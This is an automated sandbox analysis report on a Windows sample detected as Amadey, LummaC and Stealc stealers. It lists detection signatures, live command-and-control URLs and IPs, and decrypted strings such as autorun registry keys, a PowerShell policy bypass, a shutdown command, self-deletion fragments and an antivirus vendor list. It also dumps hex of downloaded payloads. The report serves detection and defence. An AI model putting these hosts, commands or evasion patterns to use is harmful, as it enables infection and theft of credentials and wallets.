Windows Analysis Report
p199AjsEFs.exe

Overview

General Information

Sample name: p199AjsEFs.exe
renamed because original name is a hash value
Original sample name: 65f0b432d1c478584099dd485f75a04f.exe
Analysis ID: 1599839
MD5: 65f0b432d1c478584099dd485f75a04f
SHA1: 95887097bb413477819a3a4850554e59dea5ed26
SHA256: e3f63b55b34a2e157b5754474b493afff810790cbcb166c40c355f4d64e3f154
Tags: exeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: p199AjsEFs.exe Avira: detected
Source: https://toppyneedus.biz/api: Avira URL Cloud: Label: malware
Source: http://185.215.113.39/files/unique3/random.exe Avira URL Cloud: Label: phishing
Source: https://toppyneedus.biz/piZZ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exe? Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php%. Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php& Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/d Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/s2 Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/pij Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/es Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpu Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ineer Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/apiz Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php5d1ef941bc7800 Avira URL Cloud: Label: malware
Source: http://185.215.113.206 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpn Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpm Avira URL Cloud: Label: malware
Source: http://185.215.113.16:80/mine/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.39/files/sawdu5t/random.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.39/files/initlosizz198hyjdr/random.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpr Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: p199AjsEFs.exe.2268.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://toppyneedus.biz/api", "Build Version": "PsFKDg--pablo"}
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.6316.3.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "brat"}
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\is-SE3IR.tmp ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy) ReversingLabs: Detection: 41%
Source: p199AjsEFs.exe Virustotal: Detection: 72% Perma Link
Source: p199AjsEFs.exe ReversingLabs: Detection: 79%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Joe Sandbox ML: detected
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dedicleb[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Joe Sandbox ML: detected
Source: p199AjsEFs.exe Joe Sandbox ML: detected
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 185.215.113.43
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: S-%lu-
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: abc3bc1985
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: skotes.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Startup
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Programs
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: %USERPROFILE%
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: clip.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: http://
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: https://
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /quiet
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Plugins/
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: &unit=
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: shell32.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: kernel32.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: GetNativeSystemInfo
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProgramData\
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: AVAST Software
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Kaspersky Lab
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Panda Security
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Doctor Web
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 360TotalSecurity
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Bitdefender
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Norton
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Sophos
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Comodo
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: WinDefender
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 0123456789
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ------
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ?scr=1
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ComputerName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: -unicode-
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: VideoID
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProductName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: CurrentBuild
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: "taskkill /f /im "
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && timeout 1 && del
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: && Exit"
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && ren
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Powershell.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: shutdown -s -t 0
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: random

Compliance

barindex
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack
Source: p199AjsEFs.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1 Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 264662bead.tmp, 00000010.00000003.3388150366.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3387702350.00000000034D5000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3383941896.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000012.00000003.3397747715.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.16.dr

Networking

barindex
Source: Network traffic Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.6:49766 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.6:61778 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059597 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (measlyrefusz .biz) : 192.168.2.6:64546 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49712 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49741 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49752 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49763 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49850 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49994 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50000 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.6:50004 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49998
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50007 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50009 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://toppyneedus.biz/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:41:32 GMTContent-Type: application/octet-streamContent-Length: 1788416Last-Modified: Sun, 26 Jan 2025 14:20:02 GMTConnection: keep-aliveETag: "67964492-1b4a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 22 26 7b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 68 00 00 04 00 00 dd 0b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 14 03 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 70 6b 65 75 63 63 78 00 b0 19 00 00 b0 4e 00 00 a6 19 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 76 76 71 78 7a 78 72 00 10 00 00 00 60 68 00 00 04 00 00 00 24 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 68 00 00 22 00 00 00 28 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:41:35 GMTContent-Type: application/octet-streamContent-Length: 1873408Last-Modified: Sun, 26 Jan 2025 14:20:12 GMTConnection: keep-aliveETag: "6796449c-1c9600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 30 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 4a 00 00 04 00 00 9f 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 15 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 14 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 